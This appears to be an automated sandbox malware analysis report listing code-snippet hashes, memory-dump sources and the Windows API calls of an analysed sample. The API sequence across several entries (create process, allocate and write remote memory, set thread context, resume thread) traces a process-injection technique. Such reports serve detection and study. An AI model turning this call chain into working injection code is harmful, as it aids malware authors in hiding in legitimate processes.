                            • Instruction ID: 4ae6f4fdcf026d7fbd15ec7e449e4f7000b9d09eb6f87e87b6e27219fc28ac01
                            • Opcode Fuzzy Hash: 882792bef30e2928d2738ad7dede3432598f9de14707c5abdde54dcd61991056
                            • Instruction Fuzzy Hash: F0215C34600209CFCB14EF74D559AAE77F1EF88300B114568EA06EB3A5EF759D01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68136ee3f3d91c5b65501a33f0aff12b0e7af6b4a9d51a453c346d8562cefd51
                            • Instruction ID: e572650fc4d9cc43d86caa3a329b5b73271f052a2d442e9d2e68fc1b7b0656c8
                            • Opcode Fuzzy Hash: 68136ee3f3d91c5b65501a33f0aff12b0e7af6b4a9d51a453c346d8562cefd51
                            • Instruction Fuzzy Hash: D221A27CA4020ACFDB356728E4887393755EB93315F0D8869E60AC72D1E669DC85C7B2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2dfc5ac4c7006316a72891cd027ba4a18517b454a5b507775a6522b376feb4b
                            • Instruction ID: e9971c271830ea60779842ab905cdccf1fc53a36f3405fb53070d2bd58bc67b0
                            • Opcode Fuzzy Hash: d2dfc5ac4c7006316a72891cd027ba4a18517b454a5b507775a6522b376feb4b
                            • Instruction Fuzzy Hash: D6216B34600219CFDB24EB74C6647AE77F1AF88344F254469D601EB2A1DF768D40CBB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7d75ac3d6b8ee0ff4d247fcc69c805377fca8811893f39c01c971ce63e2626e5
                            • Instruction ID: 4855895691c4652946f7b0fbc704f4fcdc1e75c832d6e6cc2b6034d448313588
                            • Opcode Fuzzy Hash: 7d75ac3d6b8ee0ff4d247fcc69c805377fca8811893f39c01c971ce63e2626e5
                            • Instruction Fuzzy Hash: 72219231F102098FDB14DB69C965BAEBBF5EF88710F158065E605EB3A4DA71DD0487A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 50dc0efbef2dc4a7d05fe0e261e05c3baf08dc1efbe936469c08f1be7c5b24b9
                            • Instruction ID: 753e745d2cb9d096a9a7e9396e4f932b5179e3fc5f0d9ebf8cabbebd1c3cb034
                            • Opcode Fuzzy Hash: 50dc0efbef2dc4a7d05fe0e261e05c3baf08dc1efbe936469c08f1be7c5b24b9
                            • Instruction Fuzzy Hash: C2218030E0020A9BCB08CFA5D8546EEF7B2AF89300F55C62AE915F7350DB70AD46CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 437ae599039b22a29c82648ed9fd527109537ac41decbacdcf487b99d9223373
                            • Instruction ID: a47ded06a2b732b6ae5f087bdddcb4e280725e83aa0c57afc66081cf3b558f41
                            • Opcode Fuzzy Hash: 437ae599039b22a29c82648ed9fd527109537ac41decbacdcf487b99d9223373
                            • Instruction Fuzzy Hash: DE213B38B00219DFDB14EB64C6646AE77F2AB89340F254468D605EB265DF76CD40CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 51d7e016aeb3441d8bf62bf3827f4a6650650649b4314f8cf056f6b89e002a74
                            • Instruction ID: 010c4d196d5072e327754c8f07278b4b65e6bafeba63c97cbe5df8e39b8dbdfd
                            • Opcode Fuzzy Hash: 51d7e016aeb3441d8bf62bf3827f4a6650650649b4314f8cf056f6b89e002a74
                            • Instruction Fuzzy Hash: 0421C63C600506DFDF12FB28F844B693759EB45304F158A65D109C7269FBB4EC49CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 505c474d34bbf8a91916fa07147c9d33d27960e7ad231018b51bd7fd1434f286
                            • Instruction ID: 55ab7a941ac370462f1953559c0f58472a3fb2e59fa52b93d2471c497ddb2897
                            • Opcode Fuzzy Hash: 505c474d34bbf8a91916fa07147c9d33d27960e7ad231018b51bd7fd1434f286
                            • Instruction Fuzzy Hash: C321897AF01346DFDF11ABB4580456E7BB1EB8A364F1949A6E609C7390EB34C802C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72053be1577235ade844bb55151c7b5c313b5dd6cd9ecc8f3769d4f0851f6fd0
                            • Instruction ID: b3f1402c0c5c55d089589af16c0ab2fc7a7acd6db3b8b88d4900fadfd3bd6b68
                            • Opcode Fuzzy Hash: 72053be1577235ade844bb55151c7b5c313b5dd6cd9ecc8f3769d4f0851f6fd0
                            • Instruction Fuzzy Hash: EB211934600609CFCB14EB78D959AAE7BF1AF89301B214568E606EB3A4DF319D01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b5b40301daad41b2661d80ab5d71ba3b76a4cd5ac46524073e2141fa04eff310
                            • Instruction ID: 31cb5368586d02ba5b12298a78249eb6d756bc68aaa353b856610676257c4a4b
                            • Opcode Fuzzy Hash: b5b40301daad41b2661d80ab5d71ba3b76a4cd5ac46524073e2141fa04eff310
                            • Instruction Fuzzy Hash: 6711D675A01259CFCF21DBB894412BD7BF4EF85314F2A80BAE905E7302E635D9418BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56856024d0fa7b203fb5cc5facb20416d03421b140bc96100682abbe32174fa2
                            • Instruction ID: 755551bc28d7d0a673be45be7cd577b9b6e2bbd921c2d03d2d6d4610af180a1d
                            • Opcode Fuzzy Hash: 56856024d0fa7b203fb5cc5facb20416d03421b140bc96100682abbe32174fa2
                            • Instruction Fuzzy Hash: 9A11B230B002089FEF547A79D40073A3B95EB45390F198979D606CB396EA64CC818BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dedd73cf0a87f6b8b2b038714781351c935e98fb8cedf0d63c25761e7c4d6722
                            • Instruction ID: 065b4ea7036fb2faf292a52c5cb38b29d200906ff54ce3144e1a420c01612382
                            • Opcode Fuzzy Hash: dedd73cf0a87f6b8b2b038714781351c935e98fb8cedf0d63c25761e7c4d6722
                            • Instruction Fuzzy Hash: 8E11C430B003489FEF256A75940033A7F55DB46394F1AC97AD646CB293EA64CC418BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5f4e5a00330de589ac75d001d38fee749ecee7cc921307d4f8d244305b96f615
                            • Instruction ID: 4eee2d0e4e6690ccc98c03e5e76c7d27a8ffb473b1b30df7773fe1c22805d92a
                            • Opcode Fuzzy Hash: 5f4e5a00330de589ac75d001d38fee749ecee7cc921307d4f8d244305b96f615
                            • Instruction Fuzzy Hash: 1E012175A01219DFCF25EFB884511BD7BF5EF88310B268479EA05E7302E635D9418BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d72182d7f5a50f16713544a759bc1741c60636944d0297108b6a352a6e3d9595
                            • Instruction ID: 63e6e8061402e07dcbf3b0a1b9fda5adc3b7107f14e7d887c5dec4ffd3dafaf9
                            • Opcode Fuzzy Hash: d72182d7f5a50f16713544a759bc1741c60636944d0297108b6a352a6e3d9595
                            • Instruction Fuzzy Hash: 0301B930A001048BCB04EF55D98479ABBB5FF84310F55C174D9485B29ADBB0ED45CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 366fc40e1ed0d6705b9b098738e9ff8315a371ce5a64e7a1a9b332658b2ec73a
                            • Instruction ID: 561c950657ea75bdee34ab1a963657b29f98314747bec860193358883f4b805f
                            • Opcode Fuzzy Hash: 366fc40e1ed0d6705b9b098738e9ff8315a371ce5a64e7a1a9b332658b2ec73a
                            • Instruction Fuzzy Hash: 3411F730D0030DDFCF34DA94D98A7FEB771AF61319F1A9029D115A2192AB3049C9CB26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed4ec9199ec736161faf234146f8314ef3ad2986e36dfad519bc3e1692b66f18
                            • Instruction ID: a7ac0375896e847fb587db0d3d8c924f9c3c99c5e9cf772ad11025b61380559f
                            • Opcode Fuzzy Hash: ed4ec9199ec736161faf234146f8314ef3ad2986e36dfad519bc3e1692b66f18
                            • Instruction Fuzzy Hash: E3012C3494010A9FCB06FFB8F995A9C7BB5EF40304F5145F9C0089B266EB71AE09CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 747434d14cc8afde4fbf341f30f3ad8ac93135c19f9123768093f2ff873cd8dc
                            • Instruction ID: 168cf9f5b245a2677a4dc0f2a91905bdf7abf0dcef1f34cb3a84b3e24148222d
                            • Opcode Fuzzy Hash: 747434d14cc8afde4fbf341f30f3ad8ac93135c19f9123768093f2ff873cd8dc
                            • Instruction Fuzzy Hash: CBF01439B402088FC714EB64D498AAC73B2EF89325F1444A8E50ACB3A0CB31AD42CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c895ecbf7d92b8d46cdd1e8f3e2a78382612d8d947fe0866ade0c56d082b7a48
                            • Instruction ID: e809c687ce353d753101d74b9fc39cab8faec91386b8d0a6eef704d5c6961b3e
                            • Opcode Fuzzy Hash: c895ecbf7d92b8d46cdd1e8f3e2a78382612d8d947fe0866ade0c56d082b7a48
                            • Instruction Fuzzy Hash: 9AF0193494010A9FCB45FFB8F98199D7BB9EF80304F5046B9C0089B269EB71AE09CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:11%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:376
                            Total number of Limit Nodes:29
                            execution_graph (rendered by the report's interactive graph widget; the raw node and edge data is not reproduced here). API call nodes present in the graph, with the address of the calling code: DuplicateHandle (154da10); GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId (154d406, 154d458, 154d495, 154d4f3, all reached from 154d3c0); GetModuleHandleW (154b360); LoadLibraryExW (154b5a0, reached from 154a4b0); VirtualAllocEx (788d180, 788d1c0); WriteProcessMemory (788d288); ResumeThread (788cc00); ReadProcessMemory (788d7b3); CreateProcessA (788d900, 788d989); Wow64SetThreadContext (788ccb5); CreateActCtxA (1545ea8); DrawTextExW (5841214); GetCurrentThreadId (584869f); PostMessageW (eff1608). The eff0xxx call sites (eff00f0 through eff0ad3) fan out to the CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread wrappers in the 788cxxx/788dxxx region; the 584xxxx call sites converge on DrawTextExW.

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph for 154d3b0-154d58d (rendered graph widget; basic-block and edge data not reproduced). Blocks with calls: 154d3b0-154d44f GetCurrentProcess, 154d458-154d48c GetCurrentThread, 154d495-154d4c9 GetCurrentProcess, 154d4d2-154d4ed call 154d998, 154d4f3-154d522 GetCurrentThreadId.
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 0154D43E
                            • GetCurrentThread.KERNEL32 ref: 0154D47B
                            • GetCurrentProcess.KERNEL32 ref: 0154D4B8
                            • GetCurrentThreadId.KERNEL32 ref: 0154D511
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: ac1455f95419911152ab0fb0c5246929803df2f41d48175f1ae2fa301a10b93a
                            • Instruction ID: def61946c5c22933367d636c9d8159bde211224b9dfbdd95f68047fd62c7b0c1
                            • Opcode Fuzzy Hash: ac1455f95419911152ab0fb0c5246929803df2f41d48175f1ae2fa301a10b93a
                            • Instruction Fuzzy Hash: EE5159B09003498FDB18DFA9D548BEEBFF1FF48314F208459E049AB2A1D7785984CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph for 154d3c0-154d58d (rendered graph widget; basic-block and edge data not reproduced). Blocks with calls: 154d3c0-154d44f GetCurrentProcess, 154d458-154d48c GetCurrentThread, 154d495-154d4c9 GetCurrentProcess, 154d4d2-154d4ed call 154d998, 154d4f3-154d522 GetCurrentThreadId.
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 0154D43E
                            • GetCurrentThread.KERNEL32 ref: 0154D47B
                            • GetCurrentProcess.KERNEL32 ref: 0154D4B8
                            • GetCurrentThreadId.KERNEL32 ref: 0154D511
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: a163dd464758809d7a2c346d4a02ef8319801c3d2277bc2ce281ecaf1ea2b265
                            • Instruction ID: 1abf530b2cc4c8642edab062635e80be3c61f71530ed19dd009a472f7dbc5ec6
                            • Opcode Fuzzy Hash: a163dd464758809d7a2c346d4a02ef8319801c3d2277bc2ce281ecaf1ea2b265
                            • Instruction Fuzzy Hash: 495158B09003498FDB18DFAAD548BEEBBF5FF48314F208459E049A7360D7786984CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph for 788d8f4-788dc45 (rendered graph widget; basic-block and edge data not reproduced). The only API call is CreateProcessA, in block 788da8f-788db49.
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0788DB36
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 0c203f312ef26b74e50ff094c0c26df82a407bb48ab302133c8be811646b3cba
                            • Instruction ID: b345d31607ab4b8827b942cb4d2f3cd72a0e014214c226275199cf9fc5634d71
                            • Opcode Fuzzy Hash: 0c203f312ef26b74e50ff094c0c26df82a407bb48ab302133c8be811646b3cba
                            • Instruction Fuzzy Hash: F5A15EB1E0021ADFDB54DF69C840BEDBBB2BF48314F148569D819E7280D7749985CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (function 788d900-788dc45; CreateProcessA is called from block 788da8f-788db49)
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0788DB36
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: b0f288c155faa333d2b5c1b8d9ff60aca1f03ce2eb4c41357c2056f35fecc92b
                            • Instruction ID: e9cc536732f34cef41f42e122e5344d66d2473882e22d7093b1c0868a9709c9b
                            • Opcode Fuzzy Hash: b0f288c155faa333d2b5c1b8d9ff60aca1f03ce2eb4c41357c2056f35fecc92b
                            • Instruction Fuzzy Hash: 32914DB1E0021ADFDB64DF69C840BEDBBB2BF48314F148569D818E7280DB749985CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (function 154b117-154b3a8; GetModuleHandleW is called from block 154b360-154b38b; subcalls to 154a44c, 154a458, 154a468, 154a478, 154a488, 154b3b1, 154b3c0)
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0154B37E
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 608ce423c6aab3a31e0e10456559817b7445f4385676f0cacc992ba9cf6a3304
                            • Instruction ID: 05194e71b35fdc9fbec5d167bfe1949f1fefdeffe9822ef1eb5c87bf2a5dfaa1
                            • Opcode Fuzzy Hash: 608ce423c6aab3a31e0e10456559817b7445f4385676f0cacc992ba9cf6a3304
                            • Instruction Fuzzy Hash: F3811370A04B058FD764CF6AD54479ABBF1FF88308F048A2ED48ADBA50DB35E945CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 01545F59
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 834caa694aee0bafedad3584e481b717704c5d2eabe2568f7cd1c592fff15ae2
                            • Instruction ID: 658b544f6a1041eb8f3d6f402a615dce3f4c870daff5cefdd6e924995a096123
                            • Opcode Fuzzy Hash: 834caa694aee0bafedad3584e481b717704c5d2eabe2568f7cd1c592fff15ae2
                            • Instruction Fuzzy Hash: 9241E0B0C00719CFDB24DFA9C848B9EBBF1BF88704F20806AD419AB255D7756946CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 01545F59
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 82f628dc2d99616c08db8354d265bc68ecb61b78194024fa5fc1a921e3751ff1
                            • Instruction ID: b49ed6c2cd611c8ee1382731cde9a2741d1afe026b41c36ec994875906a7d6a2
                            • Opcode Fuzzy Hash: 82f628dc2d99616c08db8354d265bc68ecb61b78194024fa5fc1a921e3751ff1
                            • Instruction Fuzzy Hash: 4241F0B0C00719CBDB24DFA9C848B9EBBF5BF48708F20806AD418AB255DB756946CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0154B37E
                              • Part of subcall function 0154A4B0: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0154B3F9,00000800,00000000,00000000), ref: 0154B60A
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: a1206ef02e2e889acea0664f71b9e82d1ffeae2984c43bc26662a3fc93c57b54
                            • Instruction ID: e82c9e43835e2ebcf54d5350b2e003be9a7ded0090c53c477cb3202036f1dfb1
                            • Opcode Fuzzy Hash: a1206ef02e2e889acea0664f71b9e82d1ffeae2984c43bc26662a3fc93c57b54
                            • Instruction Fuzzy Hash: 322192B59002058FDB10CF6AD8447AFBBF5FF85318F15806AD919EB250D734D806CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0584D2C5,?,?), ref: 0584D377
                            Memory Dump Source
                            • Source File: 00000008.00000002.2142405964.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5840000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: DrawText
                            • String ID:
                            • API String ID: 2175133113-0
                            • Opcode ID: 5c4a2d9aab2530b1338c5f300417780ff6e028078f9afb8dba9c23385ae0bf16
                            • Instruction ID: 9a04aac7367838fa011b79d5053ecdb92b02143bb8a3dbf179f612254211d54d
                            • Opcode Fuzzy Hash: 5c4a2d9aab2530b1338c5f300417780ff6e028078f9afb8dba9c23385ae0bf16
                            • Instruction Fuzzy Hash: 2931EEB5D0520D9FCB10CF9AD884AAEFBF5FB48320F14842AE919A7310D774A944CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0584D2C5,?,?), ref: 0584D377
                            Memory Dump Source
                            • Source File: 00000008.00000002.2142405964.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5840000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: DrawText
                            • String ID:
                            • API String ID: 2175133113-0
                            • Opcode ID: deccef2e9b5c16598cd9f3a6b8ae33b069ac71b8f684cf29f45d70a6fbf7d318
                            • Instruction ID: c9c9e372bc344d17b8c7569abaa904abfdc957d3be7c81da05cdd7d27d54050c
                            • Opcode Fuzzy Hash: deccef2e9b5c16598cd9f3a6b8ae33b069ac71b8f684cf29f45d70a6fbf7d318
                            • Instruction Fuzzy Hash: 2531C0B59012499FDB10CF9AD884ADEFBF5FB48310F14842AE919A7310D774A944CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0788D2D0
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: c2afc0466d4f440ee78ab916742393f7780023b803a2533a5aa12a36c91d830c
                            • Instruction ID: be323fe1f7dbeac3c45b1bdea86d0e6c0a925cb4f360ce1dc9df02376578a85b
                            • Opcode Fuzzy Hash: c2afc0466d4f440ee78ab916742393f7780023b803a2533a5aa12a36c91d830c
                            • Instruction Fuzzy Hash: 112127B59003499FCB10DFA9C885BEEBBF5FF48310F108429E919A7251D778A954CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0788D2D0
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 3c06a07bfb120f82ec9146914934cb5e5f9e1df765e9e17f67cacb1d24346aee
                            • Instruction ID: c784123fb12cd14d9d65c910011fc5ee394a6f451ab91aba602da5ef1fae43a2
                            • Opcode Fuzzy Hash: 3c06a07bfb120f82ec9146914934cb5e5f9e1df765e9e17f67cacb1d24346aee
                            • Instruction Fuzzy Hash: 8C214AB5D003499FCB10DFA9C885BEEBBF5FF48310F108429E919A7241C778A954CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0788CCEE
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: abfaea5cd5ee179539b26df75579cc026824a172b8f1bfda42d42cb87608f313
                            • Instruction ID: bc4887113b77297952150a1cf1cb0821000711d633cce611a3762536a35697ba
